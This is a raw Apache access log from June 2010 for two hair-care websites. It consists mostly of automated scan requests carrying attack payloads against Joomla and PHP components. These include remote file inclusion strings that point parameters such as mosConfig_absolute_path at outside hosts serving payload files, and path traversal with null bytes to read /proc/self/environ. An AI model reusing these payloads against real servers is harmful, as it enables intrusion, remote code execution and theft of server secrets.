93.186.192.124 - - [28/Jun/2010:03:17:53 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:17:53 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:17:53 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:17:53 -0700] "GET /logs/access.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:18:01 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:18:01 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:18:01 -0700] "GET /logs/access.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.108.64.192 - - [28/Jun/2010:03:18:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
208.80.193.42 - - [28/Jun/2010:03:20:01 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sbcydsl 3.12; SV1; YPC 3.2.0; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
89.108.64.192 - - [28/Jun/2010:03:20:08 -0700] "GET /logs/access_100201.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:03:20:09 -0700] "GET /logs/access_100614.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:03:20:09 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:03:20:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:03:20:09 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:03:20:09 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
121.78.118.123 - - [28/Jun/2010:03:20:58 -0700] "GET /logs/access_100208.log/index.php?option=com_content&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:03:21:30 -0700] "GET /logs/access_100621.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:03:21:52 -0700] "GET /logs/access.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:21:52 -0700] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:21:52 -0700] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:21:57 -0700] "GET /logs/access.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:21:57 -0700] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:21:57 -0700] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:22:00 -0700] "GET /logs/access.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:22:00 -0700] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:03:22:00 -0700] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.108.64.192 - - [28/Jun/2010:03:22:19 -0700] "GET /logs/access_091026.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:03:22:20 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:03:22:20 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
114.108.151.149 - - [28/Jun/2010:03:22:48 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [28/Jun/2010:03:22:49 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [28/Jun/2010:03:22:50 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [28/Jun/2010:03:23:11 -0700] "GET /logs/access.log/index.php?option=com_zimbcomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [28/Jun/2010:03:23:12 -0700] "GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [28/Jun/2010:03:23:13 -0700] "GET /logs/index.php?option=com_zimbcomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
200.202.243.41 - - [28/Jun/2010:03:27:11 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
200.202.243.41 - - [28/Jun/2010:03:27:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
200.202.243.41 - - [28/Jun/2010:03:27:12 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.108.64.192 - - [28/Jun/2010:03:27:45 -0700] "GET /logs/access_100301.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
72.55.176.232 - - [28/Jun/2010:03:29:47 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://phimhanquoc.info/to-be-del/images/fbfiles/ava?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.201.38.2 - - [28/Jun/2010:03:31:36 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bannerbuilder.net/images/demo/id?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
74.201.38.2 - - [28/Jun/2010:03:34:43 -0700] "GET /logs/access_100308.log//include/print_category.php?setup[use_category]=1&dir=http://www.bannerbuilder.net/images/demo/id?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
74.201.38.2 - - [28/Jun/2010:03:34:43 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bannerbuilder.net/images/demo/id?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
74.201.38.2 - - [28/Jun/2010:03:34:43 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bannerbuilder.net/images/demo/id?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.78.118.123 - - [28/Jun/2010:03:35:49 -0700] "GET /logs/access_100531.log/index.php?option=com_content&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.115.111.245 - - [28/Jun/2010:03:36:11 -0700] "GET /?D=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:03:36:15 -0700] "GET /?M=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:03:36:19 -0700] "GET /?S=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:03:36:24 -0700] "GET /logs/access.log HTTP/1.1" 200 260581 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
72.32.91.251 - - [28/Jun/2010:03:37:06 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://ph.adroo.com/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "growlonghairfast.com"
72.32.91.251 - - [28/Jun/2010:03:37:06 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://ph.adroo.com/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "growlonghairfast.com"
208.115.111.245 - - [28/Jun/2010:03:37:15 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 1441792 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:03:37:15 -0700] "GET /logs/access_100510.log HTTP/1.1" 200 1048576 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
200.202.243.41 - - [28/Jun/2010:03:37:20 -0700] "GET /logs/access_100614.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
200.202.243.41 - - [28/Jun/2010:03:37:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
200.202.243.41 - - [28/Jun/2010:03:37:21 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
208.115.111.245 - - [28/Jun/2010:03:37:44 -0700] "GET /logs/scripts.log HTTP/1.1" 200 30065 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
72.55.176.232 - - [28/Jun/2010:03:37:57 -0700] "GET /logs/access_100308.log//include/print_category.php?setup[use_category]=1&dir=http://phimhanquoc.info/to-be-del/images/fbfiles/ava?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.176.232 - - [28/Jun/2010:03:37:57 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://phimhanquoc.info/to-be-del/images/fbfiles/ava?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.176.232 - - [28/Jun/2010:03:37:57 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://phimhanquoc.info/to-be-del/images/fbfiles/ava?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [28/Jun/2010:03:38:21 -0700] "GET /logs/access_100503.log/index.php?option=com_content&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.46.204.238 - - [28/Jun/2010:03:40:26 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "freehairsecrets.com"
207.46.204.238 - - [28/Jun/2010:03:41:11 -0700] "GET / HTTP/1.1" 200 926 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "freehairsecrets.com"
121.78.118.123 - - [28/Jun/2010:03:41:13 -0700] "GET /logs/access.log/index.php?option=com_content&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [28/Jun/2010:03:41:14 -0700] "GET /index.php?option=com_content&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [28/Jun/2010:03:41:15 -0700] "GET /logs/index.php?option=com_content&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
200.202.243.41 - - [28/Jun/2010:03:41:28 -0700] "GET /logs/access_100621.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
208.115.111.245 - - [28/Jun/2010:03:42:10 -0700] "GET /?D=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:03:42:15 -0700] "GET /?M=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:03:42:20 -0700] "GET /?S=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:03:42:47 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 1900544 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:03:42:52 -0700] "GET /logs/access_100510.log HTTP/1.1" 200 1507328 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.248 - - [28/Jun/2010:03:46:59 -0700] "GET /logs/access_091130.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:03:47:03 -0700] "GET /logs/access_091207.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:03:47:08 -0700] "GET /logs/access_091214.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:03:47:14 -0700] "GET /logs/access_091221.log HTTP/1.1" 200 760051 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:03:47:19 -0700] "GET /logs/access_091228.log HTTP/1.1" 200 636872 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:03:47:33 -0700] "GET /logs/access_100104.log HTTP/1.1" 200 553567 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
216.129.119.47 - - [28/Jun/2010:03:48:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
174.136.55.175 - - [28/Jun/2010:03:49:11 -0700] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
174.136.55.175 - - [28/Jun/2010:03:50:06 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.115.111.248 - - [28/Jun/2010:03:50:35 -0700] "GET /logs/access_100111.log HTTP/1.1" 200 1004971 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:03:51:25 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 1274743 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.245 - - [28/Jun/2010:03:51:28 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 1638400 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:03:51:51 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:03:57:04 -0700] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:03:57:46 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:03:58:37 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
208.115.111.248 - - [28/Jun/2010:03:59:40 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:02:11 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.11.230.201 - - [28/Jun/2010:04:02:11 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.11.230.201 - - [28/Jun/2010:04:02:11 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.11.230.201 - - [28/Jun/2010:04:03:16 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:03:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:03:16 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:03:29 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:05:54 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:05:55 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:06:40 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:06:40 -0700] "GET /logs/access_100607.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:06:40 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
163.24.136.10 - - [28/Jun/2010:04:08:01 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
163.24.136.10 - - [28/Jun/2010:04:08:01 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
163.24.136.10 - - [28/Jun/2010:04:08:01 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.11.230.201 - - [28/Jun/2010:04:08:14 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.248 - - [28/Jun/2010:04:08:14 -0700] "GET /logs/access_100208.log HTTP/1.1" 200 1638400 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:04:08:56 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:04:08:56 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
66.11.230.201 - - [28/Jun/2010:04:09:37 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.11.230.201 - - [28/Jun/2010:04:09:37 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.11.230.201 - - [28/Jun/2010:04:09:37 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:04:10:15 -0700] "GET /logs/access.log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:04:10:16 -0700] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
